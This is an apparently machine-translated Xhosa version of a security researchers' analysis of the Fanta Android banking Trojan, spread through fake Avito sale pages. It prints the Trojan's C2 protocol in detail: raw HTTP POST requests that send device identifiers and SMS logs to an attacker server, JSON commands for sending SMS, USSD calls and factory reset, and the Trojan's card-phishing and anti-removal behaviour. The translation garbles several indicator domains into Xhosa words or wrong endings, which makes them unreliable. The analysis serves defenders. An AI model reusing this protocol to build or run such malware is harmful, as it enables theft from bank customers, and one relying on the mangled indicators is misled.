I-Leysya, iFanta: iqhinga elitsha le-Android Trojan endala

Ngenye imini ufuna ukuthengisa into kwi-Avito kwaye, emva kokuthumela inkcazo ecacileyo yemveliso yakho (umzekelo, imodyuli ye-RAM), uya kufumana lo myalezo ulandelayo:

Xa uvula ikhonkco, uya kubona iphepha elibonakala lingenatyala likwazisa, umthengisi owonwabileyo nophumeleleyo, ukuba ukuthengwa kwakho kwenziwe:

Nje ukuba ucofe iqhosha elithi "Qhubeka", ifayile ye-APK iya kukhutshelwa kwisixhobo sakho se-Android ngomfanekiso kunye negama elithembekileyo. Ufake isicelo esithe ngenxa yesizathu esithile sacela amalungelo eNkonzo yokuFikelela, emva koko kwavela iifestile ezimbalwa kwaye zanyamalala ngokukhawuleza kwaye ... Yiyo loo nto.

Uya kujonga ibhalansi yakho, kodwa ngesizathu esithile isicelo sakho sebhanki sibuza iinkcukacha zekhadi lakho kwakhona. Emva kokufaka idatha, kwenzeka into eyoyikisayo: ngenxa yesizathu esithile esingenakuqondakala kuwe, imali iqala ukunyamalala kwiakhawunti yakho. Uzama ukulungisa ingxaki, kodwa ifowuni yakho iyaxhathisa: icinezela umva kunye nezitshixo zasekhaya ngokwayo, ayicimi kwaye ayikuvumeli ukuba usebenze nawaphi na amanyathelo okhuseleko. Ngenxa yoko, ushiywe ngaphandle kwemali, imveliso yakho ayithengwa, udidekile kwaye uzibuze: kwenzeka ntoni?

Impendulo ilula: ulixhoba le-Fanta Android Trojan, usapho lweFlexnet. Ingaba yenzeke njani? Ngoku makhe sicacise.

Ababhali: UAndrey Polovinkin, Umhlalutyi weKhowudi yoBunya, UIvan Pisarev, Umhlalutyi weKhowudi ekhohlakeleyo.

Ezinye iinkcukacha

Usapho lweFlexnet lwe-Android Trojans lwaxelwa okokuqala ngo-2015. Ngaphezulu kwexesha elide lomsebenzi, usapho luye lwanda kwiintlobo ezininzi ze-subspecies: iFanta, iLimebot, iLipton, njl. I-Trojan, kunye neziseko ezingundoqo ezinxulumene nayo, azimi ngxi: izikimu ezintsha zokusasaza ezisebenzayo ziyaphuhliswa - kwimeko yethu, amaphepha akumgangatho ophezulu wokukhohlisa ajolise kumthengisi othile, kunye nabaphuhlisi beTrojan balandela iindlela zefashoni ze. ubhalo lwentsholongwane - bongeza ukusebenza okutsha okwenza kube lula ukuba imali ngokufanelekileyo kwizixhobo ezosulelekileyo kunye neendlela zokukhusela zokudlula.

Iphulo elichazwe kweli nqaku lijolise kubasebenzisi abavela eRashiya, inani elincinci lezixhobo ezisulelekileyo zirekhodwe e-Ukraine, kwaye zincinci eKazakhstan naseBelarus.

Nangona i-Flexnet ikwi-Android Trojan arene iminyaka engaphezu kwe-4 kwaye ifundwe ngokubanzi ngabaphandi abaninzi, isekwimo entle. Ukususela ngoJanuwari 2019, inani elinokubakho lomonakalo lingaphezulu kwe-ruble yezigidi ezingama-35 - kwaye oku kuphela kumaphulo eRashiya. Kwi-2015, iinguqulelo ezahlukeneyo zale Trojan ye-Android zathengiswa kwiiforamu ezingaphantsi komhlaba, apho unokufumana kwakhona ikhowudi yomthombo weTrojan ngenkcazo ecacileyo. Kwaye oku kuthetha ukuba izibalo zomonakalo kwihlabathi zichukumisa ngakumbi. Ayingomntu umbi umntu omdala kangaka, andithi?

Ukusuka kwintengiso ukuya kwi-scam

Njengoko kunokubonwa kwi-screenshot eboniswe ngaphambili yephepha le-phishing phantsi kwenkonzo ye-Intanethi yokubeka iintengiso ze-Avito, yayilungiselelwe ixhoba elithile. Kubonakala ukuba, abahlaseli basebenzisa enye yee-parers ze-Avito, ukukhupha inombolo yefowuni kunye negama lomthengisi, kunye nenkcazo yemveliso. Emva kokuhambisa iphepha kunye nokulungiselela ifayile ye-APK, umyalezo we-SMS uthunyelwa kwixhoba kunye negama lakhe kunye nekhonkco kwiphepha le-phishing eliqulethe inkcazo yemveliso yakhe kunye nemali efunyenwe "kwintengiso" yemveliso. Ngokucofa iqhosha, umsebenzisi ufumana ifayile ye-APK engalunganga-Fanta.

Uphononongo lwe-shcet491[.]ru idomeyini ibonise ukuba inikezelwe kwiiseva ze-DNS ze-Hostinger:

• ns1.hostinger.ru
• ns2.hostinger.ru
• ns3.hostinger.ru
• ns4.hostinger.ru

Ifayile yendawo yommandla iqulethe amangeniso alatha kwiidilesi ze-IP 31.220.23[.]236, 31.220.23[.]243, kunye ne-31.220.23[.]235. Nangona kunjalo, irekhodi ye-domain master resource (A-record) ikhomba kumncedisi ngedilesi ye-IP 178.132.1[.]240.

Idilesi yeIP 178.132.1[.]240 ifumaneka eNetherlands kwaye yeyehostele. umlambo wehlabathi. Iidilesi ze-IP 31.220.23[.]235, 31.220.23[.]236 kunye ne-31.220.23[.]243 zibekwe e-United Kingdom kwaye zezomncedisi wokubamba okwabelwana ngawo HOSTINGER. Isetyenziswa njengombhalisi openprov-ru. Imimandla nayo isonjululwe kwidilesi ye-IP 178.132.1[.]240:

• sdelka-ru[.]ru
• imveliso-av[.]ru
• av-imveliso[.]ru
• en-deal[.]en
• shcet382[.]ru
• sdelka221[.]en
• sdelka211[.]en
• vyplata437[.]ru
• viplata291[.]en
• inguqulelo273[.]en
• inguqulelo901[.]en

Kufuneka kuqatshelwe ukuba amakhonkco ale fomathi ilandelayo ayefumaneka phantse kuzo zonke iindawo:

http://(www.){0,1}<%domain%>/[0-9]{7}

Le template ikwabandakanya ikhonkco elivela kumyalezo weSMS. Ngokweedatha zembali, kwafunyaniswa ukuba amakhonkco amaninzi ngokwepatheni engentla ahambelana ne-domain enye, ebonisa ukusetyenziswa kwesizinda esinye ukusabalalisa iTrojan kumaxhoba amaninzi.

Masitsibe phambili kancinci: njengomncedisi wolawulo, iTrojan ekhutshelwe kwikhonkco kwiSMS isebenzisa idilesi. onuseseddohap[.]club. Esi sizinda sabhaliswa ngo-2019-03-12, kwaye ukususela ngo-2019-04-29, izicelo ze-APK zidibene nesi sizinda. Ngokusekelwe kwidatha efunyenwe kwi-VirusTotal, inani elipheleleyo lezicelo ze-109 zidibene nale seva. I-domain ngokwayo isonjululwe kwidilesi ye-IP 217.23.14[.]27, ehlala eNetherlands kwaye inomninimzi umlambo wehlabathi. Isetyenziswa njengombhalisi igama. Imimandla nayo iye yasonjululwa kule dilesi ye-IP bad-racoon[.]iklabhu (ukuqala kwi-2018-09-25) kunye bad-racoon[.]phila (ukusukela kwi-2018-10-25). ngedomeyini bad-racoon[.]iklabhu usebenzisane ngaphezu 80 iifayile APK, nge bad-racoon[.]phila - ngaphezu kwe-100.

Ngokubanzi, uhlaselo luhamba ngolu hlobo lulandelayo:

UFanta unantoni phantsi kwesivalo?

Njengamanye amaninzi e-Android Trojans, iFanta iyakwazi ukufunda nokuthumela imiyalezo ye-SMS, yenza izicelo ze-USSD, kwaye ibonise iifestile zayo phezu kwezicelo (kubandakanywa neebhanki). Nangona kunjalo, kwi-arsenal yokusebenza kwale ntsapho ifikile: iFanta yaqala ukusebenzisa Inkonzo yokuFikelela ngeenjongo ezahlukeneyo: ukufunda imixholo yezaziso zezinye izicelo, ukuthintela ubhaqo kunye nokuyeka ukuphunyezwa kweTrojan kwisixhobo esosulelekileyo, njl. IFanta isebenza kuzo zonke iinguqulelo ze-Android ezindala kune-4.4. Kweli nqaku, siza kujonga ngakumbi le sampuli ilandelayo yeFanta:

• MD5: 0826bd11b2c130c4c8ac137e395ac2d4
• SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Ngokukhawuleza emva kokuqaliswa

Ngokukhawuleza emva kokuqaliswa, iTrojan ifihla i icon yayo. Isicelo sinokusebenza kuphela ukuba igama lesixhobo esosulelekileyo alikho kuluhlu:

• Zonke iinkonzo ze-intanethi
• VirtualBox
• I-Nexus 5X(intloko yenkomo)
• I-Nexus 5(incakuba)

Olu qwalaselo lwenziwa kwinkonzo yeTrojan engundoqo - Inkonzo engundoqo. Ngexesha lokuphehlelelwa kokuqala, iiparamitha zoqwalaselo lwesicelo ziqalwa ngamaxabiso angagqibekanga (uqwalaselo lwefomathi yokugcina idatha kunye nentsingiselo yazo iya kuxoxwa kamva), kunye nokubhaliswa kwesixhobo esitsha esosulelekileyo kwiseva yolawulo. Isicelo se-HTTP POST siya kuthunyelwa kwiseva ngohlobo lomyalezo bhalisa_bot kunye nolwazi malunga nesixhobo esosulelekileyo (inguqulo ye-Android, i-IMEI, inombolo yefowuni, igama lomsebenzisi kunye nekhowudi yelizwe apho umqhubi abhaliswe khona). Idilesi isetyenziswa njengomncedisi wolawulo hXXp://onuseseddohap[.]club/controller.php. Ukuphendula, umncedisi uthumela umyalezo oqulethe imihlaba bot_id, bot_pwd, Mncedisi -La maxabiso agcinwa sisicelo njengeparameters zeseva yeCnC. Ipharamitha Mncedisi ngokuzikhethela ukuba indawo ayizange yamkelwe: UFanta usebenzisa idilesi yobhaliso − hXXp://onuseseddohap[.]club/controller.php. Umsebenzi wokutshintsha idilesi ye-CnC ingasetyenziselwa ukusombulula iingxaki ezimbini: ukusasaza ngokulinganayo umthwalo phakathi kweeseva ezininzi (kunye nenani elikhulu lezixhobo ezosulelekileyo, umthwalo kumncedisi wewebhu ongalungiswanga unokuba phezulu), kunye nokusebenzisa enye indlela. umncedisi kwimeko yokusilela komnye wabancedisi be CnC .

Ukuba kwenzeka impazamo ngelixa uthumela isicelo, iTrojan iya kuphinda inkqubo yobhaliso emva kwemizuzwana engama-20.

Emva kokubhalisa ngempumelelo isixhobo, uFanta uya kubonisa umyalezo olandelayo kumsebenzisi:

Inqaku elibalulekileyo: inkonzo ebizwa Ukhuseleko lweNkqubo -igama lenkonzo yeTrojan, kwaye emva kokucofa iqhosha Lungile iwindow enezicwangciso zofikelelo lwesixhobo esosulelekileyo ziyakuvula, apho umsebenzisi kufuneka anike amalungelo ofikelelo ngenkonzo engalunganga:

Nje ukuba umsebenzisi avule Inkonzo yokuFikelela, Fanta ifikelela imixholo yesicelo windows kunye neentshukumo ezenziwa kuzo:

Ngokukhawuleza emva kokufumana amalungelo okuFikelela, iTrojan icela amalungelo omlawuli kunye namalungelo okufunda izaziso:

Ngoncedo lweNkonzo yokuFikelela, isicelo silinganisa ii-keystrokes, ngaloo ndlela sizinika onke amalungelo ayimfuneko.

I-Fanta idala iimeko ezininzi zogcino-lwazi (eziya kuchazwa kamva) eziyimfuneko ukugcina idatha yoqwalaselo, kunye nolwazi malunga nesixhobo esosulelekileyo esiqokelelwe ngexesha lenkqubo. Ukuthumela ulwazi oluqokelelweyo, iTrojan yenza umsebenzi ophindaphindiweyo owenzelwe ukukhulula amasimi kwisiseko sedatha kwaye ufumane umyalelo kumncedisi wokulawula. Ixesha lokufowunela i-CnC libekwe ngokuxhomekeke kwinguqulo ye-Android: kwimeko ye-5.1, ikhefu liya kuba yimizuzwana eyi-10, ngaphandle koko imizuzwana engama-60.

Ukufumana umyalelo, uFanta wenza isicelo GetTask kumncedisi wolawulo. Ukuphendula, i-CnC ingathumela omnye wale miyalelo ilandelayo:

Iqela	inkcazelo
0	Thumela umyalezo weSMS
1	Yenza umnxeba okanye umyalelo we-USSD
2	Hlaziya iparameter ithuba
3	Hlaziya iparameter zi thintele
6	Hlaziya iparameter smsManejala
9	Qala ukuqokelela imiyalezo yeSMS
11	Seta kwakhona ifowuni kwisetingi zasefektri
12	Ukwenza/Ukukhubaza ukuloga kokwenziwa kweebhokisi zencoko yababini

I-Fanta iphinda iqokelele izaziso ezivela kwiibhanki ze-70, intlawulo ekhawulezayo kunye nezicelo ze-wallet kwaye zigcine kwi-database.

Ukugcinwa kweeparamitha zoqwalaselo

Ukugcina iiparamitha zoqwalaselo, iFanta isebenzisa indlela eqhelekileyo yeqonga le-Android − Ezikhethwayo-iifayile. Useto luyakugcinwa kwifayile enegama izilungiselelo. Inkcazo yeeparamitha ezigciniweyo kwitheyibhile engezantsi.

Igama	Ixabiso elimiselweyo	Amaxabiso anokwenzeka	inkcazelo
id	0	Eninzi	I-ID yeBot
Mncedisi	hXXp://onuseseddohap[.]iklabhu/	URL	Idilesi yeseva yolawulo
pwd	-	Umgca	Igama lokugqitha leseva
ithuba	20	Eninzi	Ixesha lekhefu. Ibonisa ukuba ungalibazisa ixesha elingakanani le misebenzi ilandelayo: Xa uthumela isicelo malunga nesimo somyalezo weSMS othunyelweyo Ukufumana umyalelo omtsha kumncedisi wolawulo
zi thintele	zonke	yonke/inombolo yomnxeba	Ukuba umhlaba ulingana nomtya zonke okanye Inombolo yomnxeba, emva koko umyalezo ofunyenweyo weSMS uya kwamkelwa sisicelo kwaye ungaboniswa kumsebenzisi
smsManejala	0	0/1	Yenza / vala usetyenziso njengomamkeli weSMS ongagqibekanga
funda iDialog	amanga	Yinyani/bubuxoki	Yenza/Khubaza ukuloga kwesiganeko AccessibilityEvent

UFanta usebenzisa ifayile smsManejala:

Igama	Ixabiso elimiselweyo	Amaxabiso anokwenzeka	inkcazelo
pckg	-	Umgca	Igama lomphathi weSMS elisetyenzisiweyo

Ukusebenzisana kweDatabase

I-Trojan isebenzisa i-database ezimbini ngexesha lokusebenza kwayo. Isiseko sedatha esinikwe igama a isetyenziselwa ukugcina ulwazi olwahlukeneyo oluqokelelwe kwifowuni. Isiseko sedatha sesibini sithiywe ifanta.db kwaye isetyenziselwa ukugcina izicwangciso ezinoxanduva lokudala i phishing windows eyilelwe ukuqokelela ulwazi malunga namakhadi ebhanki.

ITrojan isebenzisa isiseko sedatha а ukugcina ulwazi oluqokelelweyo kunye nokuloga izenzo zabo. Idatha igcinwe kwitafile logs. Lo mbuzo ulandelayo weSQL usetyenziswa ukwenza itheyibhile:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Uvimba weenkcukacha unolwazi olulandelayo:

1. Ukuloga isixhobo esosulelekileyo ngomyalezo Ifowuni ivuliwe!

2. Izaziso ezivela kwizicelo. Umyalezo wenziwe ngokwe template elandelayo:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Idatha yekhadi lebhanki kwiifom ze-phishing ezenziwe yiTrojan. Ipharamitha VIEW_NAME inokuba ngomnye woluhlu:

• AliExpress
• Avito
• Google Play
• Iintlobo ngeentlobo <%App Name%>

Umyalezo ufakwe kwifomathi:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Imiyalezo yeSMS engenayo / ephumayo ngendlela:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Ulwazi malunga nempahla eyenza ibhokisi yencoko yababini ngendlela:

(<%Package name%>)<%Package information%>

Umzekelo wetheyibhile logs:

Enye yemisebenzi yeFanta yingqokelela yolwazi malunga namakhadi ebhanki. Idatha iqokelelwa ngokudala iifestile ze-phishing xa uvula izicelo zebhanki. ITrojan yenza i phishing window kube kanye kuphela. Ulwazi oluboniswe yifestile kumsebenzisi lugcinwe kwitafile izilungiselelo kwiziko ledatha ifanta.db. Lo mbuzo ulandelayo weSQL usetyenziswa ukwenza idatabase:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Onke amabala etafile izilungiselelo iqaliswe ukuya ku-1 (yenza ifestile yokukhohlisa) ngokungagqibekanga. Emva kokuba umsebenzisi efake idatha yakhe, ixabiso liya kusekwa ku-0. Umzekelo wemimandla yeTheyibhile izilungiselelo:

• uyakwazi_ukungena - intsimi inoxanduva lokubonisa ifom xa uvula isicelo sebhanki
• ibhanki yokuqala - ayisetyenziswanga
• can_avito - intsimi inoxanduva lokubonisa ifom xa uvula isicelo se-Avito
• can_ali - intsimi inoxanduva lokubonisa ifom xa uvula isicelo se-Aliexpress
• inga_enye - intsimi inoxanduva lokubonisa ifom xa uvula nasiphi na isicelo kuluhlu: Yula, Pandao, Drome Auto, Wallet. Isaphulelo kunye namakhadi ebhonasi, Aviasales, Booking, Trivago
• can_card - intsimi inoxanduva lokubonisa ifom xa uvula Google Play

Ukusebenzisana nomncedisi wolawulo

Unxibelelwano lwenethiwekhi kunye nomncedisi wolawulo lwenzeka nge-HTTP protocol. UFanta usebenzisa ithala leencwadi elidumileyo leRetrofit ukuze asebenze nenethiwekhi. Izicelo zithunyelwa ku hXXp://onuseseddohap[.]club/controller.php. Idilesi yomncedisi ingatshintshwa xa ubhalisa kwiseva. Ikuki inokubuyiselwa kwiseva. UFanta wenza ezi zicelo zilandelayo kumncedisi:

• Ukubhaliswa kweBot kumncedisi wolawulo kwenzeka kanye ekuqaleni kokuqala. Le datha ilandelayo malunga nesixhobo esosulelekileyo ithunyelwa kwiseva:
  · Cookies Iikuki ezifunyenwe kumncedisi (ixabiso elihlala lihleli luluhlu olungenanto)
  · imo - umtya rhoqo bhalisa_bot
  · isimaphambili - inani elipheleleyo 2
  · inguqulelo_sdk - yenziwe ngokwethempleyithi ilandelayo: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
  · IMEI — IMEI yesixhobo esosulelekileyo
  · lizwe - ikhowudi yelizwe apho umqhubi abhaliswe khona, kwifomathi ye-ISO
  · inani - inombolo yomnxeba
  · umqhubi - igama lomsebenzisi

  Umzekelo wesicelo esithunyelwe kwiseva:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 144
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
  

  Ukuphendula isicelo, umncedisi makabuyisele into ye JSON equlathe ezi parameters zilandelayo:
  bot_id — isichongi sesixhobo esosulelekileyo. Ukuba i-bot_id ilingana no-0, uFanta uzakuphinda enze isicelo.
  bot_pwd - igama lokugqitha kumncedisi.
  umncedisi — idilesi yomncedisi wolawulo. Ukhetho lweparameter. Ukuba iparameter ayichazwanga, idilesi egcinwe kwisicelo iya kusetyenziswa.

  Umzekelo wento yeJSON:

  {
      "response":[
     	 {
     		 "bot_id": <%BOT_ID%>,
     		 "bot_pwd": <%BOT_PWD%>,
     		 "server": <%SERVER%>
     	 }
      ],
      "status":"ok"
  }

• Isicelo sokufumana umyalelo kumncedisi. Le datha ilandelayo ithunyelwe kwiseva:
  · Cookies — iikuki ezifunyenwe kwiseva
  · ibhidi - i-id yesixhobo esosulelekileyo, esafunyanwa xa kuthunyelwa isicelo bhalisa_bot
  · pwd -iphasiwedi yomncedisi
  · icandelo_lolawulo - intsimi inquma ukuba amalungelo omlawuli afunyenwe. Ukuba amalungelo omlawuli afunyenwe, intsimi ilingana ne 1, kungenjalo 0
  · Ufikelelo - ubume beNkonzo yokuFikelela. Ukuba inkonzo yaqalwa, ixabiso li 1, kungenjalo 0
  · SMSManejala -ibonisa ukuba itrojan ivuliwe njengesicelo esingagqibekanga sokufumana iSMS
  · wekhusi — ibonisa ukuba isikrini sikweyiphi na imeko. ixabiso lizakusetwa 1ukuba isikrini sivuliwe, kungenjalo 0;

  Umzekelo wesicelo esithunyelwe kwiseva:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

  Kuxhomekeke kumyalelo, umncedisi angabuyisela into ye-JSON eneeparamitha ezahlukeneyo:

  · Iqela Thumela umyalezo weSMS: Iiparamitha ziqulethe inombolo yefowuni, isicatshulwa somyalezo weSMS kunye nesazisi somyalezo oza kuthunyelwa. Isazisi sisetyenziswa xa kuthunyelwa umyalezo kumncedisi ngodidi setSmsStatus.

  {
      "response":
      [
     	 {
     		 "mode": 0,
     		 "sms_number": <%SMS_NUMBER%>,
     		 "sms_text": <%SMS_TEXT%>,
     		 "sms_id": %SMS_ID%
     	 }
      ],
      "status":"ok"
  }

  · Iqela Yenza umnxeba okanye umyalelo we-USSD: Inombolo yefowuni okanye umyalelo ufika emzimbeni wempendulo.

  {
      "response":
      [
     	 {
     		 "mode": 1,
     		 "command": <%TEL_NUMBER%>
     	 }
      ],
      "status":"ok"
  }

  · Iqela Guqula ipharamitha yesithuba.

  {
      "response":
      [
     	 {
     		 "mode": 2,
     		 "interval": <%SECONDS%>
     	 }
      ],
      "status":"ok"
  }

  · Iqela Guqula ipharamitha yokuthintela.

  {
      "response":
      [
     	 {
     		 "mode": 3,
     		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
     	 }
      ],
      "status":"ok"
  }

  · Iqela Tshintsha indawo yeSmsManager.

  {
      "response":
      [
     	 {
     		 "mode": 6,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

  · Iqela Qokelela imiyalezo yeSMS kwisixhobo esosulelekileyo.

  {
      "response":
      [
     	 {
     		 "mode": 9
     	 }
      ],
      "status":"ok"
  }

  · Iqela Seta kwakhona ifowuni kwisetingi zasefektri:

  {
      "response":
      [
     	 {
     		 "mode": 11
     	 }
      ],
      "status":"ok"
  }

  · Iqela Guqula i-ReadDialog setting.

  {
      "response":
      [
     	 {
     		 "mode": 12,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

• Ukuthumela umyalezo ngodidi setSmsStatus. Esi sicelo senziwa emva kokuphunyezwa komyalelo Thumela umyalezo weSMS. Isicelo sijongeka ngolu hlobo:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

• Ukungenisa imixholo yovimba weenkcukacha. Umtya omnye ugqithiselwa ngokwesicelo ngasinye. Le datha ilandelayo ithunyelwe kwiseva:
  · Cookies — iikuki ezifunyenwe kwiseva
  · imo - umtya rhoqo setSaveInboxSms
  · ibhidi - i-id yesixhobo esosulelekileyo, esafunyanwa xa kuthunyelwa isicelo bhalisa_bot
  · umbhalo — okubhaliweyo kwirekhodi yangoku yedatha (indawo d etafileni logs kwiziko ledatha а)
  · inani - igama lerekhodi yedatha yangoku (indawo p etafileni logs kwiziko ledatha а)
  · sms_imowudi - ixabiso elipheleleyo (indawo m etafileni logs kwiziko ledatha а)

  Isicelo sijongeka ngolu hlobo:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

  Emva kokungeniswa ngempumelelo kumncedisi, umqolo uya kususwa kwitafile. Umzekelo wento ye-JSON ebuyiswe ngumncedisi:

  {
      "response":[],
      "status":"ok"
  }

Ukusebenzisana neNkonzo yokuFikelela

INkonzo yokuFikelela yaphunyezwa ukwenza kube lula kubantu abakhubazekileyo ukusebenzisa izixhobo ze-Android. Kwiimeko ezininzi, intsebenziswano yomzimba iyafuneka ukuze udibane nesicelo. AccessibilityService ikuvumela ukuba uzenze ngokwenkqubo. UFanta usebenzisa inkonzo ukwenza iifestile ezingeyonyani kwizicelo zebhanki kunye nokuthintela useto lwenkqubo kunye nezinye izicelo ekuvuleni.

Isebenzisa usetyenziso lweNkonzo yokuFikelela, iTrojan ijonga utshintsho kwizinto ezikwisikrini sesixhobo esosulelekileyo. Njengoko kuchaziwe ngaphambili, iisetingi zeFanta ziqulathe iparameter enoxanduva lokuloga imisebenzi ngeebhokisi zencoko yababini - funda iDialog. Ukuba olu khetho lusetiwe, ulwazi malunga negama kunye nenkcazo yepakethe ekhuphe isiganeko iya kongezwa kwisiseko sedatha. ITrojan yenza ezi ntshukumo zilandelayo xa isenziwa:

• Ilinganisa izitshixo zasemva nasekhaya kwimeko:
  · ukuba umsebenzisi ufuna ukuphinda aqalise isixhobo sakhe
  · ukuba umsebenzisi ufuna ukucima isicelo "Avito" okanye ukutshintsha amalungelo okufikelela
  · ukuba kukho ukukhankanywa kwesicelo se "Avito" kwiphepha
  · xa uvula "Google Play Protect" app
  · xa uvula amaphepha aneeSetingi zeNkonzo yokuFikelela
  · xa uKhuseleko lwebhokisi yencoko yababini ivela
  · xa uvula iphepha ngoseto "Zoba ngaphezulu kolunye usetyenziso"
  · xa uvula iphepha elithi "Iizicelo", "Ugcino kunye nokuSeta kwakhona", "Ukusetha kwakhona iDatha", "Setha kwakhona iiSetingi", "Iphaneli yoMphuhlisi", "Spec. amathuba”, “Ukufikeleleka”, “Amalungelo awodwa”
  · ukuba isiganeko senziwe zizicelo ezithile.

  Uluhlu Lwezicelo

  • Android
  • Master Lite
  • Master Clean
  • Coca Master for x86 CPU
  • Ulawulo lweMvume yeSicelo saseMeizu
  • Ukhuseleko lwe-MIUI
  • Coca Master-Antivirus & Cache & Junk Cleaner
  • Ulawulo lwabazali kunye neGPS: Kaspersky SafeKids
  • I-Kaspersky Antivirus AppLock kunye ne-Web Security Beta
  • Isicoci seVirus, iAntivirus, isiCoco (MAX ukhuseleko)
  • Mobile AntiVirus Security PRO
  • I-Avast antivirus kunye nokukhuselwa simahla kwe2019
  • Ukhuseleko lweselula iMegaFon
  • Ukhuseleko lwe-AVG lweXperia
  • Ukhuseleko lweselula
  • I-Malwarebytes antivirus kunye nokukhuselwa
  • I-Antivirus ye-Android ka-2019
  • Inkosi yoKhuseleko-Antivirus, VPN, AppLock, Booster
  • I-antivirus yeAVG yethebhulethi yeHuawei Umphathi weNkqubo
  • Ukufikeleleka kweSamsung
  • Samsung Smart Manager
  • UMphathi wezoKhuseleko
  • Isantya soKwenza
  • UGqirhaWeb
  • UGqirha iWebhu yoKhuseleko
  • Dr.Web Mobile Control Centre
  • Ubomi beNdawo yoKhuseleko lukaGqr
  • Dr.Web Mobile Control Centre
  • Unqulo kunye ne-Mobile Security
  • Ukhuseleko lwe-Intanethi lweKaspersky: iAntivirus kunye noKhuselo
  • Ubomi bebhetri yeKaspersky: Saver & Booster
  • Ukhuseleko lweKaspersky Endpoint - ukhuseleko kunye nolawulo
  • I-AVG Antivirus yasimahla ka-2019-uKhuselo lwe-Android
  • I-antivirus Android
  • Norton Mobile Security kunye Antivirus
  • I-Antivirus, i-firewall, i-VPN, ukhuseleko lweselula
  • Ukhuseleko lweselula: I-Antivirus, i-VPN, i-Anti-ubusela
  • I-Antivirus ye-Android

• Ukuba imvume iceliwe xa uthumela umyalezo weSMS kwinombolo emfutshane, uFanta ulinganisa ukucofa ibhokisi yokukhangela Khumbula ukhetho kunye neqhosha thumela.
• Xa uzama ukususa amalungelo omlawuli kwiTrojan, ivala isikrini sefowuni.
• Ithintela abalawuli abatsha ukuba bongezwe.
• Ukuba isicelo se-antivirus dr.web Ubhaqe isoyikiso, uFanta ulinganisa ukucofa iqhosha ungahoyi.
• Itrojan ilinganisa ukucofa umva kunye neqhosha lasekhaya ukuba isiganeko senziwe sisicelo Ukhathalelo lweSixhobo seSamsung.
• UFanta wenza iifestile zokurhwaphiliza ngeefomu zokufaka ulwazi malunga namakhadi ebhanki ukuba isicelo esisuka kuluhlu olumalunga ne-30 yeenkonzo ezahlukeneyo ze-Intanethi ziqalisiwe. Phakathi kwazo: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drome Auto, njl.
  

  Iifomu zokuPhishing

  UFanta uhlalutya ukuba zeziphi iinkqubo ezisebenza kwisixhobo esosulelekileyo. Ukuba isicelo somdla sivuliwe, iTrojan ibonisa iwindow ye-phishing phezu kwazo zonke ezinye, okuyifomu yokufaka ulwazi malunga nekhadi lebhanki. Umsebenzisi kufuneka afake idatha elandelayo:

  • Inombolo yekhadi
  • Usuku lokuphelelwa kwekhadi
  • CVV
  • Igama lomnini khadi (hayi leebhanki zonke)

  Kuxhomekeke kwisicelo esisebenzayo, iifestile ezahlukeneyo zokukhohlisa ziya kuboniswa. Le ilandelayo yimizekelo yeminye yayo:

  I-Aliexpress:

  
  Avto:

  
  Kwezinye izicelo ezifana IMarike yoDlalo lukaGoogle, iiAviasales, Pandao, Booking, Trivago:
  

  Kwakunjani ngokwenene
  

  Ngethamsanqa, umntu ofumene umyalezo we-SMS ochazwe ekuqaleni kweli nqaku waba yingcali ye-cybersecurity. Ngoko ke, inguqu yokwenyani, engeyiyo yomlawuli ihluke kuleyo ixelwe ngaphambili: umntu wafumana i-SMS enomdla, emva koko wayinika iqela le-Iqela le-IB Threat Hunting Intelligence. Isiphumo sohlaselo leli nqaku. Isiphelo esonwabisayo, akunjalo? Nangona kunjalo, akuwona onke amabali aphela kakuhle, kwaye ukuze eyakho ingabonakali njengento yomlawuli kunye nokulahlekelwa yimali, kwiimeko ezininzi kwanele ukuthobela le mithetho ilandelayo echazwe ixesha elide:

  • Sukufakela usetyenziso lwesixhobo sakho esiphathwayo se-Android kuwo nawuphi na umthombo ngaphandle koDlalo lukaGoogle
  • xa ufaka isicelo, nikela ingqalelo ekhethekileyo kumalungelo acelwe sisicelo
  • nikela ingqalelo kwizandiso zeefayile ezilayishiwe
  • faka uhlaziyo lwe-Android OS rhoqo
  • sukundwendwela izixhobo ezikrokrisayo kwaye ungazikhupheli iifayile ukusuka apho
  • Musa ukucofa amakhonkco afunyenwe kwimiyalezo yeSMS.

umthombo: www.habr.com